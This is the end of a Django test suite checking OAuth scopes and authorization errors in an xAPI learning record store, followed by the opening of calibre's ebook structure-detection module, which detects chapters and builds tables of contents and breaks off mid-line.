self.assertEqual(get2.status_code, 200) self.assertEqual(get_content2['statements'][0]['actor']['name'], 'bill') self.assertEqual(len(get_content2['statements']), 1) def test_state_wrong_auth(self): # This test agent is not in this auth url = 'http://testserver/XAPI/activities/state' testagent = '{"name":"joe","mbox":"mailto:[email protected]"}' activityId = "http://www.iana.org/domains/example/" stateId = "id:the_state_id" activity = Activity(activity_id=activityId) activity.save() testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent} teststate = {"test":"put activity state 1"} path = '%s?%s' % (url, urllib.urlencode(testparams)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature put = self.client.put(path, data=teststate, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(put.status_code, 404) self.assertEqual(put.content, "Agent in state cannot be found to match user in authorization") def test_profile_wrong_auth(self): agent = Agent(name="joe", mbox="mailto:[email protected]") agent.save() # Agent is not in this auth url = 'http://testserver/XAPI/agents/profile' testparams = {"agent": '{"name":"joe","mbox":"mailto:[email protected]"}'} path = '%s?%s' % (url, urllib.urlencode(testparams)) oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='profile') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature get = self.client.get(path, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(get.status_code, 403) self.assertEqual(get.content, "Authorization doesn't match agent in profile") def test_define_scope_activity(self): url = 'http://testserver/XAPI/statements' guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed", "display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) # build stmt data and path put_guid = str(uuid.uuid1()) stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"test://test/define/scope", 'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'}, 'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course', 'interactionType': 'other'}}}) param = {"statementId":put_guid} path = "%s?%s" % (url, urllib.urlencode(param)) # START PUT STMT oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements - does not have define scope, therefore it creates another activity with # canonical_version as false resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) acts = Activity.objects.all() self.assertEqual(len(acts), 2) self.assertEqual(acts[0].activity_id, acts[1].activity_id) # ========================================================== # START GET STMT get_params = {"activity":"test://test/define/scope"} path = "%s?%s" % (url, urllib.urlencode(get_params)) # User same oauth headers, change nonce oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce' # Create oauth request and add signature oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token) sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"') get_resp = self.client.get(path, X_Experience_API_Version="1.0.0", Authorization=new_oauth_headers) self.assertEqual(get_resp.status_code, 200) content = json.loads(get_resp.content) self.assertEqual(len(content['statements']), 2) self.client.logout() # ========================================================== # START OF POST WITH ANOTHER HANDSHAKE post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/tested","display": {"en-US":"tested"}}, "object": {"id":"test://test/define/scope", 'definition': {'name': {'en-US':'definename', 'en-GB': 'definealtname'}, 'description': {'en-US':'definedesc', 'en-GB': 'definealtdesc'},'type': 'type:course', 'interactionType': 'other'}}} stmt_json = json.dumps(post_stmt) post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='define statements/write') # from_token_and_callback takes a dictionary post_param_list = post_oauth_header_resource_params.split(",") post_oauth_header_resource_params_dict = {} for p in post_param_list: item = p.split("=") post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del post_oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST', http_url='http://testserver/XAPI/statements/', parameters=post_oauth_header_resource_params_dict) post_signature_method = oauth.SignatureMethod_HMAC_SHA1() post_signature = post_signature_method.sign(post_oauth_request, self.consumer2, post_access_token) post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature # This adds the act_def to the very first activity created in this test since this has define scope post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json", Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(post.status_code, 200) acts = Activity.objects.all() # One canonical act from jane, one local act for oauth_group jane is in since don't have define, # one local act for dick self.assertEqual(len(acts), 3) global_act = Activity.objects.get(canonical_version=True) global_name_list = global_act.activity_definition_name self.assertEqual(global_name_list, {}) global_desc_list = global_act.activity_definition_description self.assertEqual(global_desc_list, {}) jane_agent = Agent.objects.get(mbox="mailto:[email protected]") jane_oauth_group = Agent.objects.get(objectType='Group', member__in=[jane_agent]) non_global_act_jane_oauth = Activity.objects.get(canonical_version=False, authority=jane_oauth_group) non_global_name_list_jane_oauth = non_global_act_jane_oauth.activity_definition_name.values() self.assertIn('testname', non_global_name_list_jane_oauth) self.assertIn('altname', non_global_name_list_jane_oauth) non_global_desc_list_jane_oauth = non_global_act_jane_oauth.activity_definition_description.values() self.assertIn('testdesc', non_global_desc_list_jane_oauth) self.assertIn('altdesc', non_global_desc_list_jane_oauth) dick_agent = Agent.objects.get(mbox="mailto:[email protected]") dick_oauth_group = Agent.objects.get(objectType='Group', member__in=[dick_agent]) non_global_act_dick_oauth = Activity.objects.get(canonical_version=False, authority=dick_oauth_group) non_global_name_list_dick_oauth = non_global_act_dick_oauth.activity_definition_name.values() self.assertIn('definename', non_global_name_list_dick_oauth) self.assertIn('definealtname', non_global_name_list_dick_oauth) non_global_desc_list_dick_oauth = non_global_act_dick_oauth.activity_definition_description.values() self.assertIn('definedesc', non_global_desc_list_dick_oauth) self.assertIn('definealtdesc', non_global_desc_list_dick_oauth) def test_define_scope_agent(self): url = 'http://testserver/XAPI/statements' guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/helped", "display": {"en-US":"helped"}},"object": {"objectType":"Agent", "mbox":"mailto:[email protected]", "name":"tim"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) # build stmt data and path put_guid = str(uuid.uuid1()) stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/talked","display": {"en-US":"talked"}}, "object": {"objectType":"Agent", "mbox":"mailto:[email protected]","name":"tim timson"}}) param = {"statementId":put_guid} path = "%s?%s" % (url, urllib.urlencode(param)) # START PUT STMT oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) agents = Agent.objects.all().values_list('name', flat=True) # Jane, Anonymous agent for account, Group for jane and account, bill, bob, tim, tim timson self.assertEqual(len(agents), 7) self.assertIn('tim', agents) self.assertIn('tim timson', agents) tim = Agent.objects.get(name='tim timson') self.assertFalse(tim.canonical_version) tim = Agent.objects.get(name='tim') self.assertTrue(tim.canonical_version) # ================================================= # START GET STMT get_params = {"agent":{"objectType": "Agent", "mbox":"mailto:[email protected]"}, "related_agents":True} path = "%s?%s" % (url, urllib.urlencode(get_params)) # Use same oauth headers, replace nonce oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce' # Create oauth request and add signature oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token) sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2) new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"') get_resp = self.client.get(path, X_Experience_API_Version="1.0.0", Authorization=new_oauth_headers) self.assertEqual(get_resp.status_code, 200) content = json.loads(get_resp.content) # Should only be one since querying by tim email. Will only pick up global tim object self.assertEqual(len(content['statements']), 1) self.client.logout() # ================================================== # START OF POST WITH ANOTHER HANDSHAKE # Anonymous group that will make 2 canonical agents ot = "Group" members = [{"name":"john doe","mbox":"mailto:[email protected]"}, {"name":"jan doe","mbox":"mailto:[email protected]"}] kwargs = {"objectType":ot, "member": members, "name": "doe group"} global_group, created = Agent.objects.retrieve_or_create(**kwargs) # Anonymous group that will retrieve two agents and create one more canonical agents members = [{"name":"john doe","mbox":"mailto:[email protected]"}, {"name":"jan doe","mbox":"mailto:[email protected]"}, {"name":"dave doe", "mbox":"mailto:[email protected]"}] kwargs1 = {"objectType":ot, "member": members, "name": "doe group"} post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/assisted","display": {"en-US":"assisted"}}, "object": kwargs1} stmt_json = json.dumps(post_stmt) post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='statements/write statements/read') # from_token_and_callback takes a dictionary post_param_list = post_oauth_header_resource_params.split(",") post_oauth_header_resource_params_dict = {} for p in post_param_list: item = p.split("=") post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del post_oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST', http_url='http://testserver/XAPI/statements/', parameters=post_oauth_header_resource_params_dict) post_signature_method = oauth.SignatureMethod_HMAC_SHA1() post_signature = post_signature_method.sign(post_oauth_request, self.consumer2, post_access_token) post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json", Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(post.status_code, 200) agents = Agent.objects.all() # These 5 agents are all non-global since created w/o define scope non_globals = Agent.objects.filter(canonical_version=False).values_list('name', flat=True) self.assertEqual(len(non_globals), 4) self.assertIn('bill', non_globals) self.assertIn('tim timson', non_globals) self.assertIn('dom', non_globals) self.assertIn('doe group', non_globals) # 2 oauth group objects, all of these agents since created with member or manually and 2 anon # account agents for the accounts in the oauth groups global_agents = Agent.objects.filter(canonical_version=True).values_list('name', flat=True) self.assertEqual(len(global_agents), 12) self.assertIn('bob', global_agents) self.assertIn('tim', global_agents) self.assertIn('jan doe', global_agents) self.assertIn('john doe', global_agents) self.assertIn('dave doe', global_agents) self.assertIn('jane', global_agents) self.assertIn('dick', global_agents) self.assertIn('doe group', global_agents) def test_default_scope_multiple_requests(self): oauth_header_resource_params, access_token = self.oauth_handshake(scope=False) stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}}, "object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}) # from_token_and_callback takes a dictionary post_param_list = oauth_header_resource_params.split(",") post_oauth_header_resource_params_dict = {} for p in post_param_list: item = p.split("=") post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del post_oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature post_oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST', http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict) post_signature_method = oauth.SignatureMethod_HMAC_SHA1() post_signature = post_signature_method.sign(post_oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % post_signature post = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(post.status_code, 200) # ==================================================== stmt2 = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/failed","display": {"en-US":"failed"}}, "object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}) # Use same oauth headers, replace nonce post_oauth_header_resource_params_dict['oauth_nonce'] = 'post_differ_nonce' # Create oauth request and add signature post_oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST', http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict) post_signature_method2 = oauth.SignatureMethod_HMAC_SHA1() post_signature2 = post_signature_method2.sign(post_oauth_request2, self.consumer, access_token) sig = oauth_header_resource_params.replace('"%s"' % post_signature, '"%s"' % post_signature2) new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="post_differ_nonce"') resp = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt2, content_type="application/json", Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) def test_update_activity_with_oauth_containing_user(self): url = 'http://testserver/XAPI/statements' guid = str(uuid.uuid1()) stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed", "display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}} stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) # build stmt data and path put_guid = str(uuid.uuid1()) stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"test://test/define/scope", 'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'}, 'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course', 'interactionType': 'other'}}}) param = {"statementId":put_guid} path = "%s?%s" % (url, urllib.urlencode(param)) # START PUT STMT oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements - should update existing activity since jane is in oauth group resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) acts = Activity.objects.all() self.assertEqual(len(acts), 1) act = acts[0].to_dict() self.assertEqual(act['id'], 'test://test/define/scope') self.assertIn('definition', act) def test_update_activity_created_with_oauth(self): url = 'http://testserver/XAPI/statements' # build stmt data and path put_guid = str(uuid.uuid1()) stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed", "display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}} param = {"statementId":put_guid} path = "%s?%s" % (url, urllib.urlencode(param)) # START PUT STMT oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements - should update existing activity since jane is in oauth group resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) # ================================================================== stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"test://test/define/scope", 'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'}, 'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course', 'interactionType': 'other'}}}) stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) acts = Activity.objects.all() self.assertEqual(len(acts), 1) act = acts[0].to_dict() self.assertEqual(act['id'], 'test://test/define/scope') self.assertIn('definition', act) def test_multiple_client_get(self): url = 'http://testserver/XAPI/statements' # build stmt data and path put_guid = str(uuid.uuid1()) stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed", "display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}} param = {"statementId":put_guid} path = "%s?%s" % (url, urllib.urlencode(param)) # START PUT STMT oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define') # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] # Create oauth request and add signature oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT', http_url=path, parameters=oauth_header_resource_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature # Put statements - should update existing activity since jane is in oauth group resp = self.client.put(path, data=stmt, content_type="application/json", Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 204) # ================================================================== # build stmt data and path put_guid2 = str(uuid.uuid1()) stmt2 = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed", "display": {"en-US":"passed"}},"object": {"id":"test://mult-test"}} param2 = {"statementId":put_guid2} path2 = "%s?%s" % (url, urllib.urlencode(param2)) # START PUT STMT oauth_header_resource_params2, access_token2 = self.oauth_handshake(scope_type='statements/write define', consumer=self.consumer2jane) # from_token_and_callback takes a dictionary param_list2 = oauth_header_resource_params2.split(",") oauth_header_resource_params_dict2 = {} for p in param_list2: item = p.split("=") oauth_header_resource_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict2['OAuth realm'] # Create oauth request and add signature oauth_request2 = oauth.Request.from_token_and_callback(access_token2, http_method='PUT', http_url=path2, parameters=oauth_header_resource_params_dict2) signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer2jane, access_token2) oauth_header_resource_params2 += ',oauth_signature="%s"' % signature2 # Put statements - should update existing activity since jane is in oauth group resp2 = self.client.put(path2, data=stmt2, content_type="application/json", Authorization=oauth_header_resource_params2, X_Experience_API_Version="1.0.0") self.assertEqual(resp2.status_code, 204) # ================================================================== stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"}, "verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}}, "object": {"id":"test://test/define/scope", 'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'}, 'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course', 'interactionType': 'other'}}}) stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json", Authorization=self.jane_auth, X_Experience_API_Version="1.0.0") self.assertEqual(stmt_post.status_code, 200) # ================================================================== stmt_get = self.client.get(reverse(statements), X_Experience_API_Version="1.0.0", Authorization=self.jane_auth) self.assertEqual(stmt_get.status_code, 200) content = json.loads(stmt_get.content) self.assertEqual(len(content['statements']), 3) jane_clients = Consumer.objects.filter(user=self.user) self.assertEqual(len(jane_clients), 2)
#!/usr/bin/env python # vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai from __future__ import with_statement __license__ = 'GPL v3' __copyright__ = '2009, Kovid Goyal <[email protected]>' __docformat__ = 'restructuredtext en' import re, uuid from lxml import etree from urlparse import urlparse from collections import OrderedDict, Counter from calibre.ebooks.oeb.base import XPNSMAP, TOC, XHTML, xml2text, barename from calibre.ebooks import ConversionError def XPath(x): try: return etree.XPath(x, namespaces=XPNSMAP) except etree.XPathSyntaxError: raise ConversionError( 'The syntax of the XPath expression %s is invalid.' % repr(x)) def isspace(x): return not x or x.replace(u'\xa0', u'').isspace() def at_start(elem): ' Return True if there is no content before elem ' body = XPath('ancestor-or-self::h:body')(elem) if not body: return True body = body[0] ancestors = frozenset(XPath('ancestor::*')(elem)) for x in body.iter(): if x is elem: return True if hasattr(getattr(x, 'tag', None), 'rpartition') and x.tag.rpartition('}')[-1] in {'img', 'svg'}: return False if isspace(getattr(x, 'text', None)) and (x in ancestors or isspace(getattr(x, 'tail', None))): continue return False return False class DetectStructure(object): def __call__(self, oeb, opts): self.log = oeb.log self.oeb = oeb self.opts = opts self.log('Detecting structure...') self.detect_chapters() if self.oeb.auto_generated_toc or opts.use_auto_toc: orig_toc = self.oeb.toc self.oeb.toc = TOC() self.create_level_based_toc() if self.oeb.toc.count() < 1: if not opts.no_chapters_in_toc and self.detected_chapters: self.create_toc_from_chapters() if self.oeb.toc.count() < opts.toc_threshold: self.create_toc_from_links() if self.oeb.toc.count() < 2 and orig_toc.count() > 2: self.oeb.toc = orig_toc else: self.oeb.auto_generated_toc = True self.log('Auto generated TOC with %d entries.' % self.oeb.toc.count()) if opts.toc_filter is not None: regexp = re.compile(opts.toc_filter) for node in list(self.oeb.toc.iter()): if not node.title or regexp.search(node.title) is not None: self.log('Filtering', node.title if node.title else 'empty node', 'from TOC') self.oeb.toc.remove(node) if opts.page_breaks_before is not None: pb_xpath = XPath(opts.page_breaks_before) for item in oeb.spine: for elem in pb_xpath(item.data): try: prev = elem.itersiblings(tag=etree.Element, preceding=True).next() if (barename(elem.tag) in {'h1', 'h2'} and barename( prev.tag) in {'h1', 'h2'} and (not prev.tail or not prev.tail.split())): # We have two adjacent headings, do not put a page # break on the second one continue except StopIteration: pass style = elem.get('style', '') if style: style += '; ' elem.set('style', style+'page-break-before:always') for node in self.oeb.toc.iter(): if not node.title or not node.title.strip(): node.title = _('Unnamed') if self.opts.start_reading_at: self.detect_start_reading() def detect_start_reading(self): expr = self.opts.start_reading_at try: expr = XPath(expr) except: self.log.warn( 'Invalid start reading at XPath expression, ignoring: %s'%expr) return for item in self.oeb.spine: if not hasattr(item.data, 'xpath'): continue matches = expr(item.data) if matches: elem = matches[0] eid = elem.get('id', None) if not eid: eid = u'start_reading_at_'+unicode(uuid.uuid4()).replace(u'-', u'') elem.set('id', eid) if u'text' in self.oeb.guide: self.oeb.guide.remove(u'text') self.oeb.guide.add(u'text', u'Start', item.href+u'#'+eid) self.log('Setting start reading at position to %s in %s'%( self.opts.start_reading_at, item.href)) return self.log.warn("Failed to find start reading at position: %s"% self.opts.start_reading_at) def get_toc_parts_for_xpath(self, expr): # if an attribute is selected by the xpath expr then truncate it # from the path and instead return it as where to find the title text title_attribute_regex = re.compile('/@([-\w]+)$') match = title_attribute_regex.search(expr) if match is not None: return expr[0:match.start()], match.group(1) return expr, None def detect_chapters(self): self.detected_chapters = [] self.chapter_title_attribute = None def find_matches(expr, doc): try: ans = XPath(expr)(doc) len(ans) return ans except: self.log.warn('Invalid chapter expression, ignoring: %s'%expr) return [] if self.opts.chapter: chapter_path, title_attribute = self.get_toc_parts_for_xpath(self.opts.chapter) self.chapter_title_attribute = title_attribute for item in self.oeb.spine: for x in find_matches(chapter_path, item.data): self.detected_chapters.append((item, x)) chapter_mark = self.opts.chapter_mark page_break_before = 'display: block; page-break-before: always' page_break_after = 'display: block; page-break-after: always' c = Counter() for item, elem in self.detected_chapters: c[item] += 1 text = xml2text(elem).strip() text = re.sub(r'\s+', ' ', text.strip()) self.log('\tDetected chapter:', text[:50]) if chapter_mark == 'none': continue if chapter_mark == 'rule': mark = etree.Element(XHTML('hr')) elif chapter_mark == 'pagebreak': if c[item] < 3 and at_start(elem): # For the first two elements in this item, check if they # are at the start of the file, in which case inserting a # page break in unnecessary and can lead to extra blank # pages in the PDF Output plugin. We need to use two as # feedbooks epubs match both a heading tag and its # containing div with the default chapter expression. continue mark = etree.Element(XHTML('div'), style=page_break_after) else: # chapter_mark == 'both': mark = etree.Element(XHTML('hr'), style=page_break_before) try: elem.addprevious(mark) except TypeError: self.log.exception('Failed to mark chapter') def create_level_based_toc(self): if self.opts.level1_toc is not None: self.add_leveled_toc_items() def create_toc_from_chapters(self): counter = self.oeb.toc.next_play_order() for item, elem in self.detected_chapters: text, href = self.elem_to_link(item, elem, self.chapter_title_attribute, counter) self.oeb.toc.add(text, href, play_order=counter) counter += 1 def create_toc_from_links(self): num = 0 for item in self.oeb.spine: for a in XPath('//h:a[@href]')(item.data): href = a.get('href') try: purl = urlparse(href) except ValueError: self.log.warning('Ignoring malformed URL:', href) continue if not purl[0] or purl[0] == 'file': href, frag = purl.path, purl.fragment href = item.abshref(href) if frag: href = '#'.join((href, frag)) if not self.oeb.toc.has_href(href): text = xml2text(a) text = text[:100].strip() if (not self.opts.duplicate_links_in_toc and self.oeb.toc.has_text(text)): continue num += 1 self.oeb.toc.add(text, href, play_order=self.oeb.toc.next_play_order()) if self.opts.max_toc_links > 0 and \ num >= self.opts.max_toc_links: self.log('Maximum TOC links reached, stopping.') return def elem_to_link(self, item, elem, title_attribute, counter): text = '' if title_attribute is not None: text = elem.get(title_attribute, '') if not text: text = xml2text(elem).strip() if not text: text = elem.get('title', '') if not text: text = elem.get('alt', '') text = re.sub(r'\s+', ' ', text.strip()) text = text[:1000].strip() id = elem.get('id', 